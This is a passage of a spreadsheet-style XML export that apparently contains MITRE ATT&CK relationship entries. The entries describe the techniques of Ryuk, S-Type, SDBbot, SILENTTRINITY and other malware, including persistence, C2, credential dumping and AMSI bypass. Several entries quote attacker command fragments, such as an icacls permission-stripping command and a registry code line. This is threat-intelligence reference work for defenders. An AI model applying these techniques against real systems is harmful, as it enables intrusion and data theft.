    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used Wake-on-Lan to power on turned off systems for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)</t>
  </si>
  <si>
    <t>relationship--9fb463af-4ad8-48b5-89cf-68bac34a68d7</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) has used &lt;code&gt;cmd.exe&lt;/code&gt; to create a Registry entry to establish persistence.(Citation: CrowdStrike Ryuk January 2019)</t>
  </si>
  <si>
    <t>relationship--5a7aeb29-4f1c-43e4-9efa-dc6fb812f281</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) can launch &lt;code&gt;icacls &lt;path&gt; /grant Everyone:F /T /C /Q&lt;/code&gt; to delete every access-based restrictions on files and directories.(Citation: ANSSI RYUK RANSOMWARE)</t>
  </si>
  <si>
    <t>relationship--851b5150-ad44-4af5-915a-845b3239168d</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has deleted accounts it has created.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--a5848605-3931-4dc8-a3e4-299683258c0f</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has uploaded data and files from a compromised host to its C2 servers.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--4971ab34-bfff-4384-b04f-6a7cd004ae2f</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--4b23ac99-3761-46f0-ad5d-2cf63a95036a</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has deleted files it has created on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--7bbe8987-5cb2-464d-8874-56825164313c</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) can download additional files onto a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--4a42e063-e5c1-4408-9634-fe2fe8af76b5</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has run the command `net user` on a victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--fb0aef48-57f5-4331-acdd-25fdfdf1babb</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create a temporary user on the system named `Lost_{Unique Identifier}` with the password `pond~!@6”{Unique Identifier}`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--6d819560-bdfb-4e0a-bf56-fddcba60cdb5</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>relationship--11874e26-e692-43da-bb54-760e51a4714f</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--c7e8feda-58fd-4015-9525-9032fd0b8872</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</si>
  <si>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</si>
  <si>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relationship--d067b113-4584-419f-860b-d3184f734350</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) may create the file &lt;code&gt;%HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk&lt;/code&gt;, which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--907df22e-fdfe-4b93-8b18-ebf66f83868c</t>
  </si>
  <si>
    <t>Some [S-Type](https://attack.mitre.org/software/S0085) samples have been packed with UPX.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--9873626b-74e8-456d-9e34-95a313daa27b</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--813e4416-bee6-4192-a712-6b5f80a7fff3</t>
  </si>
  <si>
    <t>The initial beacon packet for [S-Type](https://attack.mitre.org/software/S0085) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--7fbb56bf-cadd-4663-8067-f233d4c9c751</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has attempted to determine if a compromised system was using a Japanese keyboard via the `GetKeyboardType` API call.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--602c1dc8-314c-4149-805a-a9a741aa074e</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has used `ipconfig /all` on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--a65042f5-d095-48aa-9856-a8c00d528087</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has run tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--17bc166c-7598-4297-9cc1-1ee9ef4182a2</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) runs the command &lt;code&gt;net start&lt;/code&gt; on a victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--abee00d3-8417-468b-84a4-40c7d0ac4f7d</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) uses HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--4d4c8221-17a9-4e5b-86f9-6a0cffc42424</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) has provided the ability to execute shell commands on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--5ecc940b-9506-484c-8866-6a6b08b63bf0</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--1e29cbcc-3e45-4e62-a66f-4479b310ccdb</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--76d47356-a255-48ba-9cd8-1ff2e52bb165</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--102849c0-0ed7-4e85-9d0b-791bcb7ef7ab</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--27ccf817-33de-4d85-85e5-851f82e835e4</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has sent collected data from a compromised host to its C2 servers.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--afc6e4e4-2bcc-47b7-bc0d-2866d4e1dcda</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to delete files from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--f96a2b4a-4d74-4251-b714-40b224d3ad09</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to get directory listings or drive information on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--03b12a66-789a-4480-8903-deab828d08b6</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--91e86813-270d-4ee6-8dff-9b87e3d9fae4</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--08f4dfcb-c394-470d-851f-045bbc38cdb5</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to download a DLL from C2 to a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--7ef04aca-4890-4035-8c0b-69d9a78e8029</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--a7cdf456-9ad0-402b-a914-5f1ebcd873a3</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--f252d0e6-019a-4711-9069-c16930236aa4</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) can enumerate a list of running processes on a compromised machine.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--d0c15113-67a0-4f02-8a92-d22165642d40</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--1a9510e3-0bb0-4469-bbf8-2d02a3a00d66</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege. (Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--7333e2da-7aa5-4559-a03d-5818883d62d5</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--7aef9a3f-82ff-4e2e-bee7-962b49421067</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has used rundll32.exe to execute DLLs.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--5e617da4-3359-4e40-b29d-679e05ef2e31</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--63ae56fe-04c2-41f5-a2be-c1880e67b490</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the OS version, OS bit information and computer name.(Citation: Proofpoint TA505 October 2019)(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--855bcd64-ef37-4197-8d3e-2c147d42d774</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) can collected the country code of a compromised machine.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>relationship--70dc4dfe-c859-4665-88d7-ff724d88380b</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to determine the domain name and whether a proxy is configured on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--9c15fad4-3614-4bf0-90db-84749f34f91c</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to identify the user on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--9ee385ef-7e78-47bf-be25-8ba112f9280e</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--88d48848-1f23-4d91-8934-045d04b219ea</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use the command shell to execute commands on a compromised host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--efe5521e-a774-4a0f-a360-3cee8303833d</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) deletes data in a way that makes it unrecoverable.(Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>relationship--cfb4c18a-d76e-47fd-a89b-a4b4fce1c643</t>
  </si>
  <si>
    <t>relationship--35f3fba0-7deb-4436-87a2-503c96f69342</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can download remote files onto victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--04ecc705-0027-4dda-85fe-d6ce028ef05e</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can timestomp files on victims using a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--6d562520-86bb-4251-9431-a4958bec097c</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--bbe37d7e-ad35-4c74-a57c-9a398ef6b1be</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) can execute commands on victims.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--7276fbbe-3237-4e95-b2ad-8518327432ba</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--b5952b5f-281b-4ff4-9cfb-c2898f3028cc</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to upload and download files.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--8f0afd2b-8cb3-4b5b-b19f-39887602fe95</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to employ a custom PowerShell script.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--8e324a04-e543-4eed-bf21-cdf446d8f8f6</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the IP address, machine name, and OS of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--de70abfa-848f-4993-bdb8-7235d4a3d720</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the domain of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--7c606ccd-2a38-4498-8807-47f00685c203</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--f52cb753-6f2f-4f23-834a-75510e8fb47a</t>
  </si>
  <si>
    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--e0b5c501-c949-4b60-8e2e-37a584dba8fe</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028) achieves persistence by creating a shortcut in the Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--093215eb-4edb-4c55-bb5f-b8ca2de7962c</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</si>
  <si>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</si>
  <si>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relationship--114f98a4-6243-4a0c-a6c4-3e693a4f9b08</t>
  </si>
  <si>
    <t>relationship--97ff5931-f27f-4774-b595-312f5771f91a</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a directory listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>relationship--32ee78b3-58de-4de5-bc3d-34ea8dc90ca3</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to retrieve information about connected users.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>relationship--33630ee4-24dc-4339-b29f-3d8b39e7daae</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is obscured using XOR encoding and appended to a valid GIF file.(Citation: FireEye Clandestine Wolf)(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>relationship--315aab88-9b01-4a70-8f8c-173a3f29e79c</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to obtain a process listing.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>relationship--c8ce3bcd-b74f-497d-8f76-cc8c7333ab49</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>relationship--9ea25bfb-3e3a-42cb-8d2a-939169057806</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) uses [netstat](https://attack.mitre.org/software/S0104) to list TCP connection status.(Citation: Palo Alto CVE-2015-3113 July 2015)</t>
  </si>
  <si>
    <t>relationship--a5efdeb3-10db-4e40-b8cd-61dee7d72cc0</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can download and execute an arbitary executable.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--c4cbbe25-bc29-406d-b92e-6e50ee4cd322</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can capture screenshots.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--d8a844bc-373b-44aa-831a-da33d1505ae3</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--42ce3f19-e995-4a9e-b7d6-74a5a28824f9</t>
  </si>
  <si>
    <t>S0692</t>
  </si>
  <si>
    <t>SILENTTRINITY</t>
  </si>
  <si>
    <t>tool--1244e058-fa10-48cb-b484-0bcf671107ae</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate the active Window during keylogging through execution of `GetActiveWindowTitle`.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--d80a85fa-5261-4274-b50e-bb82461562af</t>
  </si>
  <si>
    <t>29 March 2022</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</si>
  <si>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</si>
  <si>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relationship--c65da10e-8b5b-4290-87a4-cbc3120bf99c</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--1c40e6c8-1a0e-41f7-8aa7-9ae294712fbe</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey("Software\\Classes\\CLSID\\{" + clsid + "}\\InProcServer32")`.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--962b8434-1beb-4774-bb9e-3a5b10d84fe3</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect clear text web credentials for Internet Explorer/Edge.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--8e2cd29d-5d72-450d-8697-d7121e1b2e8d</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692)'s `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--211e2acf-ad5b-4ab7-a1af-f6dbc656c4bf</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System` namespace methods to execute lateral movement using DCOM.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--bcef3835-1388-4bb7-850b-d248f4c1810f</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System.Security.AccessControl` namespaces to retrieve domain user information.(Citation: GitHub SILENTTRINITY Modules July 2019)  </t>
  </si>
  <si>
    <t>relationship--800b5705-d504-41af-86cb-252c6b3e267f</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System.DirectoryServices` namespace to retrieve domain group information.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--1991b422-2f89-4b90-9cea-7c34919eec05</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can transfer files from an infected host to the C2 server.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--9f5398d3-f9fe-4abc-bf10-1112f106b3d5</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can remove files from the compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--858db34b-48b3-4ab2-ac9c-ee09475d29c5</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>relationship--bee5895c-6671-4563-831b-38cb510e29fe</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692)'s `credphisher.py` module can prompt a current user for their credentials.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--e6553c0d-9f67-412a-8e72-fad7059c35b1</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) has a module that can extract cached GPP passwords.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>relationship--0f43dcda-56ff-4ac2-b79a-82b09a90944f</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) has the ability to set its window state to hidden.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--393b11b3-cf22-48e0-afb6-e9c05411b400</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--dc509494-ad76-4986-b6bd-39a30f1d9336</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can remove artifacts from the compromised host, including created Registry keys.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--2123bedd-f2b3-4856-9ee4-5d23aa9c8745</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can load additional files and tools, including [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--1b16de68-c627-4f38-a85f-bbba2fef7e20</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) contains a module to conduct Kerberoasting.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--91dc0049-df2a-4dc0-b6b4-863a9a733c7a</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) has a keylogging capability.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--e6a21902-3d34-444c-a528-f86b764375e9</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--277ac06b-0bb0-4384-b275-df180922b790</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can obtain a list of local groups and members.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--46b32cc8-892c-48da-92ab-4ec2168e3edb</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--70f37bdd-dd94-46de-b41b-dd5e04997d3b</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--60202ca3-cadc-4756-99c8-a4b18e07d116</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--9002b775-c016-404f-b9b3-16fcbcd0949c</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can scan for open ports on a compromised machine.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--87ebb077-671c-42b2-ad27-07f54b5920be</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate shares on a compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--348d10f4-8519-47a0-89d4-24119c18b638</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use PowerShell to execute commands.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--8835056d-c12a-4036-9028-7b8d867f2d79</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--e0495ed2-62d6-4fd7-9c9b-e57d3c99fd9a</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can inject shellcode directly into Excel.exe or a specific process.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--5bf6d81e-634d-4035-a895-87d2d31341ce</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) is written in Python and can use multiple Python scripts for execution on targeted systems.(Citation: GitHub SILENTTRINITY March 2022)(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--87400414-05c2-42a7-9db5-fbbac101146d</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</si>
  <si>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</si>
  <si>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relationship--75a89128-fcdd-4bcf-98a7-9f0ea162a794</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can establish a LNK file in the startup folder for persistence.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--dd6eca67-574c-433a-8764-12cc802a0387</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate and collect the properties of domain computers.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--80b87eab-243c-4e98-a85e-2684520f8824</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can take a screenshot of the current desktop.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--494a0c44-2822-4f53-977e-f36a949d8258</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can determine if an anti-virus product is installed through the resolution of the service's virtual SID.(Citation: Security Affairs SILENTTRINITY July 2019)</t>
  </si>
  <si>
    <t>relationship--f27f75b5-824d-43c9-a029-247d7d44ec8f</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect information related to a compromised host, including OS version and a list of drives.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--fbe4387a-5e79-45e0-aae1-9b3a53dcd3ee</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) can gather a list of logged on users.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>relationship--ec6dc634-8214-4817-aabb-30ffb19ad4cc</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can search for modifiable services that could be used for privilege escalation.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
